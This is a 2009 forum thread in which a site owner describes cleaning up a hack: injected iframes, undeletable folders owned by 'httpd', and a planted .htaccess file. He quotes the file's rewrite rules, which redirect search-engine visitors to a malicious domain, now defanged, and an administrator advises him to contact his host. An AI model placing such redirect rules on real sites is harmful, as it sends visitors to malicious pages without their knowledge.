Author Topic: After cleaning my hacked site can't remove certain folders -help!  (Read 12936 times)

0 Members and 1 Guest are viewing this topic.

August 14, 2009, 11:26:55 pm
Read 12936 times

philgene

  • Newbie

  • Offline
  • *

  • 2
Hi -thanks for taking the time to help! My site www.is-for-you.com got hacked and all the pages had an iframe inserted that put a link to some russian site. I changed my passwords and ftp passwords and deleted the code from all the webpages. However it also put a bunch of folders that I can't delete - when I try it says I don't have permission and shows they were created by another owner. I can't figure out how to delete or override that fakeowners id.

I assume there must be some way to do it from my CPANEL but so far no luck. Any help would be appreciated.

Thanks!! Phil

When I check the folders I see a changed .htaccess file and according to properties from ftp says the user is 'httpd" which is not my username and there are 100's of ju8nk files in these folders - all undeletable because they are owned by that username: here's some of the .htaccess content if it's of any use...wouldn't recommend clicking the live links!:

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^http://(www.)?google..*[?&]q=([^&]+)
RewriteRule ^.* hxxp://mikandamp.org/in.cgi?9&parameter=%2 [L]

RewriteCond %{HTTP_REFERER} ^http://(search.)?yahoo..*[?&]p=([^&]+)
RewriteRule ^.* hxxp://mikandamp.org/in.cgi?9&parameter=%2 [L]

/Edited by SysAdmini: Live links defused

August 15, 2009, 08:52:36 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
It seems that server where your site is hosted, has been compromised. Please contact your hosting company and tell them what you have told us.
If you don't have permission to delete or modify files, then you need help from your hosting company. It's impossible to fix it yourself.
Ruining the bad guy's day

August 15, 2009, 09:01:10 am
Reply #2

philgene

  • Newbie

  • Offline
  • *

  • 2
Thanks - I will contact them (again ) The first time I did they said their server was fine and it was only my domain. Mind you they aren't the greatest customer support. Ina ny case I appreciate your quick response and advice!

Best Regards

Phil Eugene